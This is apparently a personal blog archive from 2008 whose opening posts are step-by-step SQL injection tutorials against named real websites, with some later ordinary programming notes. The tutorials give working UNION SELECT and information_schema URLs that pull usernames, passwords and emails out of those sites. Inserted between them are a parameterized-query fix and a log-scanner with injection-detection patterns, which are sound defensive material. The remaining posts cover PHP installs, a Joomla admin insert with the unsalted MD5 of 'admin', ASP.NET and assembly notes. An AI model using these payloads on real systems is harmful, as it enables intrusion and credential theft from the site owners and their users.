The target website has been patched......
Thank you
============================================================
Tools:
1. Mozilla, IE
2. A computer connected to the internet
Other equipment (optional):
1. A cup of coffee
2. A photo of a pretty girl next to the computer...
3. Persistence....
1. Find a target
Example target: http://taseen.com.my/news/news.php?id=3
2. Check for a hole by adding ' to the URL
Example: http://taseen.com.my/news/news.php?id=3'
If an error message appears, the website is vulnerable.... hooray..hehehe
3. Now issue order commands until an error message appears. Before that .... after the = add a -
so the URL becomes: http://taseen.com.my/news/news.php?id=-3
Now keep issuing order until you hit an error....
Example:
http://taseen.com.my/news/news.php?id=3 order by 1/* <---- no error
http://taseen.com.my/news/news.php?id=3 order by 2/* <---- no error
http://taseen.com.my/news/news.php?id=3 order by 3/* <---- no error
http://taseen.com.my/news/news.php?id=3 order by 4/* <---- no error
http://taseen.com.my/news/news.php?id=3 order by 5/* <---- error
which means the website has 4 columns....
4. Now enter the command union all select 1,2,3,4/* <<<--- match the number of columns the website has
example: http://taseen.com.my/news/news.php?id=-3 union all select 1,2,3,4/*
A number will then appear. Say the number that appears is 3: that number is later replaced with a column name or an SQL command.... e.g. @@version to check the version
5. Now let's guess the columns and the table.....
table names: users/* admin/* members/* etc.
column names: user_name , user-d, user_is, username, password, pass etc.
Now let's try username
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,username,4 from users/*
ta-da...... the username shows up.......
Now try the password.....
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,password,4 from users/*
ta-da..... the password shows up too....
Now let's try both
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,concat(username,0x3a,password,0x3a,email),4 from users/*
ta-da.... the user and password show up.... All done...... that's it for now... off to study... I'm still in junior high after all...kwkwkwkw...
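The fix for the flaw these steps rely on, as an added example that is not from the original post: the id parameter concatenated into the query text, beside an allow-listed and bound version. It uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL page; the table layout, sample rows and function names are assumptions.

```python
import re
import sqlite3

# Payload copied from step 5 of the post; everything else here is constructed.
PAYLOAD = "-3 union all select 1,2,username,4 from users/*"

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        INSERT INTO news VALUES (3, 'Opening hours', 'We open at nine.', 'editor');
        INSERT INTO users VALUES ('admin', 'constructed-hash', 'admin@example.test');
    """)
    return db

def news_vulnerable(db, raw_id):
    """Pastes the parameter into the SQL text and echoes database errors."""
    sql = "SELECT id, title, body, author FROM news WHERE id = " + raw_id + " LIMIT 1"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc    # the error leak that step 2 looks for

def news_hardened(db, raw_id):
    """Allow-lists the id as a short decimal integer, then binds it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []                       # same empty result for any malformed id
    sql = "SELECT id, title, body, author FROM news WHERE id = ? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("3", "3'", PAYLOAD):
        print(repr(value), news_vulnerable(db, value), news_hardened(db, value))
```

In PHP the same change is a prepared statement (PDO or mysqli) with the id bound as an integer, plus `display_errors` turned off in production.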
Wednesday, December 03, 2008
SQL Injection Singapore website edition
Here I am again...... hehehe still SQL injection......... but the target is different, not Malay but sg........................... someday .au .us .go.id hehehehe
As usual:
1. Find a target
Example target: http://www.pdscientific.com.sg/source/news.php?id=1
2. Check for a hole by adding ' to the URL
Example: http://www.pdscientific.com.sg/source/news.php?id=1'
If an error message appears, the website is vulnerable.... hooray..hehehe
3. Now issue order commands until an error message appears. Before that .... after the = add a -
so the URL becomes: http://www.pdscientific.com.sg/source/news.php?id=1
Now keep issuing order until you hit an error....
Example:
http://www.pdscientific.com.sg/source/news.php?id=1 order by 1/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 2/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 3/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 4/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 5/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 6/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 7/* <---- no error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 8/* <---- error
So the website has 7 columns....
4. Now enter the command union all select 1,2,3,4,5,6,7/* <<<--- match the number of columns the website has
example:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,2,3,4,5,6,7/*
A number will then appear. Say the number that appears is 2: that number is later replaced with a column name or an SQL command.... e.g. @@version to check the version
5. Now let's guess the columns and the table.....
table names: users/* admin/* members/* etc.
column names: user_name , user-d, user_is, username, password, pass etc.
6. Let's have a look at the tables that exist
example:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/*
7. Let's look at the columns too
example:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns/*
Had enough of looking around ???? What you do with it is up to you
8. Now let's hunt for the username
example:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_name,3,4,5,6,7 from users/*
9. Now hunt for the password.....
example:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_pwd,3,4,5,6,7 from users/*
10. Now let's hunt for the user_id
example:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_id,3,4,5,6,7%20from%20users/*
11. Now let's hunt for the login name
example:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_login,3,4,5,6,7%20from%20users/*
12. Now let's try all of them
example:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,concat(user_id,0x3a,user_login,0x3a,user_pwd,0x3a,user_name),3,4,5,6,7%20from%20users/*
Well, that's everything..... now it's just down to your own creativity............
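What this sequence looks like from the server side, as an added example that is not from the original post: a scanner that URL-decodes query values in web access logs and flags the request shapes used in the steps above. The log lines, IP addresses, rule names and the /news.php and /search.php paths are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rule names are this example's own; patterns follow the requests shown in the post.
RULES = [
    ("stray-quote", re.compile(r"^-?\d+'")),                      # step 2: id=1'
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),  # step 3
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)), # steps 6-7
    ("open-comment", re.compile(r"/\*\s*$")),                     # trailing /*
]
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log in Apache common log format.
SAMPLE_LOG = """\
198.51.100.20 - - [03/Dec/2008:09:59:10 +0000] "GET /news.php?id=4 HTTP/1.1" 200 2310
203.0.113.7 - - [03/Dec/2008:10:00:01 +0000] "GET /news.php?id=1' HTTP/1.1" 200 512
203.0.113.7 - - [03/Dec/2008:10:00:09 +0000] "GET /news.php?id=1%20order%20by%208/* HTTP/1.1" 200 498
198.51.100.20 - - [03/Dec/2008:10:00:30 +0000] "GET /search.php?q=trade+union+news HTTP/1.1" 200 901
203.0.113.7 - - [03/Dec/2008:10:01:12 +0000] "GET /news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/* HTTP/1.1" 200 3120
""".splitlines()

def scan(lines):
    """Return {client_ip: sorted rule names} for query values that match a rule."""
    hits = {}
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue                    # not a request line we understand
        ip, target = m.groups()
        query = urlsplit(target).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            for rule, rx in RULES:
                if rx.search(value):    # value is already percent-decoded
                    hits.setdefault(ip, set()).add(rule)
    return {ip: sorted(rules) for ip, rules in hits.items()}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(rules))
```

Several rules firing for one client within minutes is a far stronger signal than any single match, and matching on decoded values keeps ordinary text such as "trade union news" from raising an alert.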
Thursday, November 27, 2008
php ajax
Huh, just completed my ajax code.. it's long code compared with dotnet, where I just need to post back the page. I need to understand the method of passing the string... just refer to www3scol and build the code back.. I tried the program repeatedly and saw the response from 127.0.0.1 come very late.. duh, better use postback in dotnet. ngonggggg
Wednesday, September 10, 2008
Linux package installation or php upgrade howto
Installing PHP is easy these days.
Red Hat enterprise Linux PHP installation
If you would like to install or upgrade PHP use up2date command:
# up2date php
CentOS/Fedora core Linux PHP installation
If you would like to install PHP use yum command
# yum install php
If you would like to upgrade PHP use yum command
# yum update php
Debian / Ubuntu Linux PHP installation
If you would like to install or upgrade PHP use apt-get command
# apt-get install php4-cgi php4-cli
# sudo apt-get install php4-cgi php4-cli
To install PHP 5
# apt-get install php5-cgi php5-cli
# sudo apt-get install php5-cgi php5-cli
FreeBSD PHP installation
Use pkg_add command as follows:
# pkg_add -v -r php
Use above command to install Apache or Lighttpd web server.
u also can use yum search (word) too
Thursday, August 21, 2008
how do I manually add an administrator user for joomla?
huhu backup ur db first b4 do this.....
all this related 3 table to insert operation....
-- The password hash below is the unsalted MD5 of 'admin'; change the password right after the first login.
INSERT INTO `jos_users` VALUES
(62, 'Administrator', 'admin', 'your-email@email.com', '21232f297a57a5a743894a0e4a801fc3', 'Super Administrator', 0, 1, 25, '2005-09-28 00:00:00', '2005-09-28 00:00:00', '', '');
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Administrator',0);
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25,'',10);
Note the extra two tables. If you are not sure what you are doing, please take care. This is directly editing the database
Saturday, May 17, 2008
gridview checkbox or any hidden template
Damn, got this task about two weeks ago.. while I got another offer from gov. Huhuh, today 17 May 08 I just completed this code in less than 10 minutes.. hahahha... so here I wanna keep this code, maybe this code can help someone.. this code reads an id from a gridview so you can do any CRUD.. I just modified this code to get my hidden templates.. alhamdulillah it works
here
Dim taskID As Integer = 0
'Dim task As Task = New Task()
'Dim row As GridViewRow
'For Each row In GridView2.Rows
'Dim result As Boolean = (CType(row.FindControl("chkSelect"), CheckBox)).Checked
'If (result) Then
taskID = Convert.ToInt32((CType(GridView2.SelectedRow.FindControl("lblTaskID"), Label)).Text)
MsgBox(taskID)
'task.UpdateTask(taskID)
'End If
'Next
my reference from azam #..his web very good reference and many time help me :p.
int taskID = 0;
Task task = new Task();
foreach (GridViewRow row in gvInComplete.Rows)
{
    bool result = ((CheckBox) row.FindControl("chkSelect")).Checked;
    if (result)
    {
        taskID = Convert.ToInt32(((Label)row.FindControl("lblTaskID")).Text);
        task.UpdateTask(taskID);
    }
}
Sunday, April 20, 2008
check html tool in gridview
this code might help someone a simple solution huh
Dim selectedvalue As String = Request.Form("myCheckbox")
8086 assembler tutorial
Duhh I've an exam this Wednesday! Tonight I must upload the tutorial that needs to be submitted tonight.. I've studied a code that I don't understand in class since I'm always talking with my friend at the back lol... I'm looking up the meaning of jmp, jne, duhh what the heck is this.. lol it is the same as if =, <>
The logic is very simple, for example:
it's required to compare 5 and 2,
5 - 2 = 3
the result is not zero (Zero Flag is set to 0).
Another example:
it's required to compare 7 and 7,
7 - 7 = 0
the result is zero! (Zero Flag is set to 1 and JZ or JE will do the jump).
i want to keep this things in my note huhuhu!!and share for all...
pray for me to do this exam ahaks this wednesday:P
Wednesday, April 09, 2008
SQL SERVER EXPRESS 2005 The operating system returned the error '5(Access is denied.)'
System.Data.SqlClient.SqlError: The operating system returned the error '5(Access is denied.)' while attempting 'RestoreContainer::ValidateTargetForCreation' on 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\TEST.MDF'. (Microsoft.SqlServer.Express.Smo)
1)give a different location to save the mdf and ldf file!
2)C:\Program Files\Microsoft SQL Server\MSSQL.1
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data
For my SQL User Accounts on my machine to allow them to write the MDF and LDF Files to those locations.
3) My solution: go to Configuration Tools - SQL Server Configuration Manager - SQL Server 2005 Services - Properties
change Network Service to Local System
HTH someone

